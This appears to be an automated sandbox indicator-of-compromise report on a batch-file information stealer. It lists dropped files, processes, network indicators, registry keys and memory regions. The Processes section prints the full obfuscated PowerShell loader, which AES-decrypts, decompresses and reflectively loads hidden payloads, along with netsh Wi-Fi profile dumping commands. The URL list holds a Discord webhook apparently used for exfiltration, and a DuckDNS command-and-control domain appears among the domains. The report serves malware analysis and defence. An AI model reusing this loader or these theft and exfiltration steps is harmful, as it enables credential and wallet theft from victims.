IOC Report
a.cmd

loading gif

Files

File Path
Type
Category
Malicious
a.cmd
ASCII text, with very long lines (46874), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\DotNetZip-f22omwiz.tmp
Zip archive data, at least v2.0 to extract, compression method=store
dropped
C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\user@473627_en-CH.zip (copy)
Zip archive data, at least v2.0 to extract, compression method=store
dropped
C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\user@473627_en-CH\Browsers\Google\History.txt
ASCII text
dropped
C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\user@473627_en-CH\Browsers\Mozilla\Firefox\Bookmarks.txt
ASCII text
dropped
C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\user@473627_en-CH\Browsers\Mozilla\Firefox\History.txt
Unicode text, UTF-8 text
dropped
C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\user@473627_en-CH\Directories\OneDrive.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\user@473627_en-CH\Directories\Startup.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\user@473627_en-CH\System\Desktop.jpg
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
dropped
C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\user@473627_en-CH\System\Info.txt
ASCII text
dropped
C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\user@473627_en-CH\System\Process.txt
ASCII text
dropped
C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\user@473627_en-CH\System\ProductKey.txt
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\user@473627_en-CH\System\Windows.txt
ASCII text
dropped
C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\user@473627_en-CH\Wallets\Edge_Wallet\Edge_Exodus\CURRENT
ASCII text
dropped
C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\user@473627_en-CH\Wallets\Edge_Wallet\Edge_Exodus\LOG
ASCII text
dropped
C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\user@473627_en-CH\Wallets\Edge_Wallet\Edge_Exodus\MANIFEST-000001
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5blwldwa.blh.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gbzezbpb.24g.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pzpccrcs.hgd.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yctc3hx2.pv2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\ce3ed400-d1e84918ad678b08d2a369a3-Latest.log
ASCII text
modified
C:\Users\user\AppData\Local\Temp\tmp562F.tmp.dat
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\tmp5640.tmp.dat
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\tmp5651.tmp.dat
SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
dropped
C:\Users\user\AppData\Local\Temp\tmp5661.tmp.dat
SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
dropped
C:\Users\user\AppData\Local\Temp\tmp5662.tmp.dat
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\tmp5692.tmp.dat
SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
dropped
C:\Users\user\AppData\Local\Temp\tmp5710.tmp.dat
SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\tmp5721.tmp.dat
SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
dropped
\Device\ConDrv
ASCII text, with very long lines (2108), with CRLF, LF line terminators
dropped
There are 24 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\a.cmd" "
malicious
C:\Windows\System32\cmd.exe
cmd /c \"set __=^&rem\
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\a.cmd"
malicious
C:\Windows\System32\cmd.exe
cmd /c \"set __=^&rem\
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\a.cmd';$LzXa='RUWTCeaUWTCdLUWTCineUWTCsUWTC'.Replace('UWTC', ''),'ChZJGfangZJGfeExZJGftenZJGfsiZJGfonZJGf'.Replace('ZJGf', ''),'CAhKEreaAhKEteDAhKEeAhKEcAhKErypAhKEtorAhKE'.Replace('AhKE', ''),'FroBWNamBBWNaasBWNae6BWNa4SBWNatrBWNaiBWNangBWNa'.Replace('BWNa', ''),'DWncieWncicomWnciprWnciessWnci'.Replace('Wnci', ''),'TrOZMganOZMgsfoOZMgrmOZMgFinOZMgalOZMgBOZMgloOZMgckOZMg'.Replace('OZMg', ''),'EleFTeEmFTeEeFTeEnFTeEtAtFTeE'.Replace('FTeE', ''),'MMLMhainMLMhMoMLMhduMLMhlMLMheMLMh'.Replace('MLMh', ''),'EnWitytWityrWityyPWityoWityintWity'.Replace('Wity', ''),'CopyJeHyTyJeHoyJeH'.Replace('yJeH', ''),'SplVFEiiVFEitVFEi'.Replace('VFEi', ''),'GetHQKMCuHQKMrHQKMreHQKMntPHQKMrocHQKMeHQKMsHQKMsHQKM'.Replace('HQKM', ''),'IhYurnvohYurkehYur'.Replace('hYur', ''),'LoaEJSmdEJSm'.Replace('EJSm', '');powershell -w hidden;function kTjsA($UARpu){$rvnjY=[System.Security.Cryptography.Aes]::Create();$rvnjY.Mode=[System.Security.Cryptography.CipherMode]::CBC;$rvnjY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$rvnjY.Key=[System.Convert]::($LzXa[3])('4RFBdW1/zR2QfqFXFvckJggLRbhWPlZ+NeGOFVeQyfc=');$rvnjY.IV=[System.Convert]::($LzXa[3])('/1MUg0yozSO51Z+kagFGTw==');$LixCy=$rvnjY.($LzXa[2])();$eKenk=$LixCy.($LzXa[5])($UARpu,0,$UARpu.Length);$LixCy.Dispose();$rvnjY.Dispose();$eKenk;}function znPjO($UARpu){$WVzHv=New-Object System.IO.MemoryStream(,$UARpu);$OjCYY=New-Object System.IO.MemoryStream;$vQDXk=New-Object System.IO.Compression.GZipStream($WVzHv,[IO.Compression.CompressionMode]::($LzXa[4]));$vQDXk.($LzXa[9])($OjCYY);$vQDXk.Dispose();$WVzHv.Dispose();$OjCYY.Dispose();$OjCYY.ToArray();}$PzMvs=[System.IO.File]::($LzXa[0])([Console]::Title);$pfOyV=znPjO (kTjsA ([Convert]::($LzXa[3])([System.Linq.Enumerable]::($LzXa[6])($PzMvs, 5).Substring(2))));$eOZhb=znPjO (kTjsA ([Convert]::($LzXa[3])([System.Linq.Enumerable]::($LzXa[6])($PzMvs, 6).Substring(2))));[System.Reflection.Assembly]::($LzXa[13])([byte[]]$eOZhb).($LzXa[8]).($LzXa[12])($null,$null);[System.Reflection.Assembly]::($LzXa[13])([byte[]]$pfOyV).($LzXa[8]).($LzXa[12])($null,$null); "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
malicious
C:\Windows\System32\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
malicious
C:\Windows\System32\netsh.exe
netsh wlan show profile
malicious
C:\Windows\System32\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
malicious
C:\Windows\System32\netsh.exe
netsh wlan show networks mode=bssid
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\chcp.com
chcp 65001
C:\Windows\System32\findstr.exe
findstr All
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\chcp.com
chcp 65001
There are 8 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
https://duckduckgo.com/chrome_newtab
unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
unknown
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
https://duckduckgo.com/ac/?q=
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15
104.21.44.66
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
unknown
http://icanhazip.com/
104.16.185.241
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
unknown
https://www.ecosia.org/newtab/
unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
unknown
https://github.com/Pester/Pester
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://oneget.orgX
unknown
https://discord.com/api/webhooks/895657579101958174/9Z8CPsHdivzzExezi2PenJZuA1sRTvhR7zSiHiSBhPgUVEAa
unknown
https://aka.ms/pscore68
unknown
https://support.mozilla.org
unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
https://oneget.org
unknown
http://ip-api.com/line/?fields=hosting
208.95.112.1
There are 24 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
dcxwq1.duckdns.org
91.92.249.117
malicious
27.58.7.0.in-addr.arpa
unknown
malicious
ip-api.com
208.95.112.1
api.mylnikov.org
104.21.44.66
icanhazip.com
104.16.185.241

IPs

IP
Domain
Country
Malicious
91.92.249.117
dcxwq1.duckdns.org
Bulgaria
malicious
208.95.112.1
ip-api.com
United States
104.21.44.66
api.mylnikov.org
United States
104.16.185.241
icanhazip.com
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\ActiveMovie\devenum 64-bit
Version
HKEY_CURRENT_USER\SOFTWARE\29D56E68178AFEF853F0
B93374FDFD9AF786FF20597AE0E242B81373984BA5718194F9E57FEB231C52CF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 6 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1EBD1B2B000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
7FFD9B810000
trusted library allocation
page read and write
1D01F744000
heap
page read and write
1D021BB1000
trusted library allocation
page read and write
1D01F990000
heap
page read and write
1D021AB5000
trusted library allocation
page read and write
1F61510E000
heap
page read and write
7FFD9B930000
trusted library allocation
page execute and read and write
7FFD9B7BC000
trusted library allocation
page execute and read and write
39D127F000
stack
page read and write
1D031841000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
2AD92E00000
heap
page read and write
1D01F6E1000
heap
page read and write
1D03988A000
heap
page read and write
39D117D000
stack
page read and write
7FFD9B78B000
trusted library allocation
page execute and read and write
7FFD9BA30000
trusted library allocation
page read and write
1AFEF093000
heap
page read and write
1F61510E000
heap
page read and write
1D0233EA000
trusted library allocation
page read and write
1AFEEDA0000
heap
page read and write
39D1479000
stack
page read and write
1F6150C0000
heap
page read and write
7FFD9BB50000
trusted library allocation
page read and write
1F615420000
heap
page read and write
1AFEEDBB000
heap
page read and write
1F61542D000
heap
page read and write
2AD92E10000
heap
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
1D021600000
trusted library allocation
page read and write
1AFEEDA2000
heap
page read and write
7FFD9B942000
trusted library allocation
page read and write
1F6150CD000
heap
page read and write
2AD92DD0000
heap
page read and write
1D021190000
heap
page read and write
1F615040000
heap
page read and write
7FFD9BB30000
trusted library allocation
page read and write
1F615425000
heap
page read and write
1AFEF09D000
heap
page read and write
1AFEF095000
heap
page read and write
1AFEEDD5000
heap
page read and write
1D0397FF000
heap
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
1F615050000
heap
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
1F6150C5000
heap
page read and write
CD1E5FF000
stack
page read and write
39D167E000
stack
page read and write
1F6150F5000
heap
page read and write
1D01F960000
trusted library allocation
page read and write
1F6150F5000
heap
page read and write
1F6150DA000
heap
page read and write
7FFD9B763000
trusted library allocation
page execute and read and write
1D01F980000
heap
page execute and read and write
1EBD1D05000
heap
page read and write
1D022C24000
trusted library allocation
page read and write
4EACCFC000
stack
page read and write
1D021858000
trusted library allocation
page read and write
1F61510E000
heap
page read and write
7FFD9BB10000
trusted library allocation
page read and write
39D15FF000
stack
page read and write
1D022710000
trusted library allocation
page read and write
39D12FE000
stack
page read and write
1EBD1AC0000
heap
page read and write
39D0DDF000
stack
page read and write
7FFD9B770000
trusted library allocation
page read and write
1AFEF095000
heap
page read and write
1F615425000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
7FFD9B920000
trusted library allocation
page execute and read and write
1D0211B8000
heap
page read and write
1F6150F5000
heap
page read and write
1AFEEDD5000
heap
page read and write
1F6150F5000
heap
page read and write
7FFD9B970000
trusted library allocation
page read and write
7FFD9BB00000
trusted library allocation
page read and write
7FFD9BA60000
trusted library allocation
page read and write
1AFEEDD8000
heap
page read and write
1F6150F4000
heap
page read and write
CD1E87F000
stack
page read and write
1F6150C5000
heap
page read and write
39D0D9E000
unkown
page read and write
1AFEEDD4000
heap
page read and write
39D16FC000
stack
page read and write
7FFD9B91A000
trusted library allocation
page read and write
1F6150C2000
heap
page read and write
1AFEEC40000
heap
page read and write
1D021770000
heap
page execute and read and write
1D03184D000
trusted library allocation
page read and write
1AFEEDFE000
heap
page read and write
7FFD9B77B000
trusted library allocation
page read and write
1AFEEDD5000
heap
page read and write
7FFD9BB70000
trusted library allocation
page read and write
1F6150F4000
heap
page read and write
7FFD9BA90000
trusted library allocation
page read and write
7FFD9BB40000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
7FFD9B764000
trusted library allocation
page read and write
1AFEF095000
heap
page read and write
7FFD9BA80000
trusted library allocation
page read and write
1D01F6BB000
heap
page read and write
1D01F748000
heap
page read and write
1F6150F4000
heap
page read and write
1F615423000
heap
page read and write
1EBD1B20000
heap
page read and write
39D157E000
stack
page read and write
1D03983A000
heap
page read and write
1F6150C5000
heap
page read and write
1AFEED40000
heap
page read and write
37344FE000
stack
page read and write
4EACEFF000
stack
page read and write
7FFD9B78D000
trusted library allocation
page execute and read and write
7FFD9B950000
trusted library allocation
page execute and read and write
1D02198E000
trusted library allocation
page read and write
7FFD9B960000
trusted library allocation
page read and write
CD1E57C000
stack
page read and write
1D039852000
heap
page read and write
2AD92E05000
heap
page read and write
AD589FF000
unkown
page read and write
373447C000
stack
page read and write
1AFEF093000
heap
page read and write
1AFEEDD4000
heap
page read and write
1F615290000
heap
page read and write
2AD92E30000
heap
page read and write
1D0217D1000
trusted library allocation
page read and write
1D0317E0000
trusted library allocation
page read and write
1D01F986000
heap
page execute and read and write
1AFEEDEE000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
4EACDFF000
unkown
page read and write
1AFEEDAD000
heap
page read and write
1F6150F9000
heap
page read and write
1AFEEDA5000
heap
page read and write
7FFD9B911000
trusted library allocation
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
1D0215D0000
trusted library allocation
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
39D0D13000
stack
page read and write
1AFEEDFF000
heap
page read and write
1AFEF092000
heap
page read and write
1D031993000
trusted library allocation
page read and write
1F6150F5000
heap
page read and write
1AFEEEA0000
heap
page read and write
1D01F8A0000
heap
page read and write
7FFD9BAF0000
trusted library allocation
page read and write
7DF4DABF0000
trusted library allocation
page execute and read and write
7FFD9BA50000
trusted library allocation
page read and write
1EBD1B30000
heap
page read and write
1D01F9E0000
heap
page read and write
1D039806000
heap
page read and write
39D1379000
stack
page read and write
1AFEEDD5000
heap
page read and write
1D01F950000
heap
page readonly
1F61510E000
heap
page read and write
373457F000
stack
page read and write
1D01F940000
trusted library allocation
page read and write
1D01F9E8000
heap
page read and write
1D01F71A000
heap
page read and write
2AD92DE0000
heap
page read and write
39D10FE000
stack
page read and write
1F61510E000
heap
page read and write
1D021C46000
trusted library allocation
page read and write
1AFEEDD5000
heap
page read and write
1D039990000
heap
page execute and read and write
1D0217C0000
heap
page read and write
1D039B10000
heap
page read and write
1D01F9E5000
heap
page read and write
39D13F7000
stack
page read and write
1D01F995000
heap
page read and write
1AFEEDEF000
heap
page read and write
1D01F6B0000
heap
page read and write
1F6150F4000
heap
page read and write
7FFD9BB20000
trusted library allocation
page read and write
1D01F6F9000
heap
page read and write
1D01F702000
heap
page read and write
39D14FA000
stack
page read and write
1AFEEDFF000
heap
page read and write
1AFEEDD5000
heap
page read and write
1D021D10000
trusted library allocation
page read and write
1F615422000
heap
page read and write
1AFEEDAD000
heap
page read and write
1D039BA5000
heap
page read and write
1D039B20000
heap
page read and write
AD588FC000
stack
page read and write
1F61510F000
heap
page read and write
1D03185D000
trusted library allocation
page read and write
1F6150F5000
heap
page read and write
1D023390000
trusted library allocation
page read and write
1EBD19E0000
heap
page read and write
7FFD9B900000
trusted library allocation
page read and write
1F61510E000
heap
page read and write
7FFD9B81C000
trusted library allocation
page execute and read and write
7FFD9BAD0000
trusted library allocation
page read and write
7FFD9B760000
trusted library allocation
page read and write
AD58AFF000
stack
page read and write
1F6150F4000
heap
page read and write
1D01F920000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
39D11FE000
stack
page read and write
1AFEEDD5000
heap
page read and write
1AFEF090000
heap
page read and write
1AFEED20000
heap
page read and write
7FFD9BB60000
trusted library allocation
page read and write
1D0398A6000
heap
page read and write
7FFD9B880000
trusted library allocation
page execute and read and write
1AFEEDEE000
heap
page read and write
1D01F8E0000
heap
page read and write
7FFD9BA70000
trusted library allocation
page read and write
1D021D0C000
trusted library allocation
page read and write
2AD92E3B000
heap
page read and write
7FFD9BA20000
trusted library allocation
page read and write
1AFEEDEE000
heap
page read and write
1D021648000
heap
page read and write
1AFEEDDA000
heap
page read and write
1AFEEDFE000
heap
page read and write
1D01F742000
heap
page read and write
7FFD9B780000
trusted library allocation
page read and write
39D20CE000
stack
page read and write
1EBD1D00000
heap
page read and write
7FFD9B816000
trusted library allocation
page read and write
1D023364000
trusted library allocation
page read and write
7FFD9B846000
trusted library allocation
page execute and read and write
7FFD9B76D000
trusted library allocation
page execute and read and write
1F6150CD000
heap
page read and write
1EBD1AE0000
heap
page read and write
1D0397D0000
heap
page read and write
1F6150CD000
heap
page read and write
1F6150F5000
heap
page read and write
39D107E000
stack
page read and write
1F6150CD000
heap
page read and write
1AFEEDD9000
heap
page read and write
1D031ACA000
trusted library allocation
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
1D0211B6000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
1D01F880000
heap
page read and write
1D01F751000
heap
page read and write
7FFD9BA00000
trusted library allocation
page read and write
1D01F704000
heap
page read and write
1D0317D1000
trusted library allocation
page read and write
1D01F6A0000
heap
page read and write
1F615070000
heap
page read and write
There are 235 hidden memdumps, click here to show them.